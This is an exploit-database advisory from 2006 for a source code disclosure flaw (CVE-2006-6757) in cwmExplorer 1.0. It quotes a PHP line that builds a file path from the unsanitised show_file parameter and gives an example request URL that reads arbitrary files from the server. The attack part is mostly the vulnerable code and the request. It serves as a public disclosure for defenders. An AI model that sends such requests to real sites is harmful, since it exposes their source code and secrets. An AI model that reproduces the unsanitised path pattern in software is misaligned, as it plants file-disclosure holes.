cwmExplorer 1.0 - 'show_file' Source Code Disclosure



EKU-ID: 10947 CVE: OSVDB-37389;CVE-2006-6757 OSVDB-ID:
Author: ajann Published: 2006-12-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


*******************************************************************************************
# Title   :  cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
$datei = "dirs/".$d."/".$_GET[show_file];
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/index.php?d=0&show_file=[file]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-19]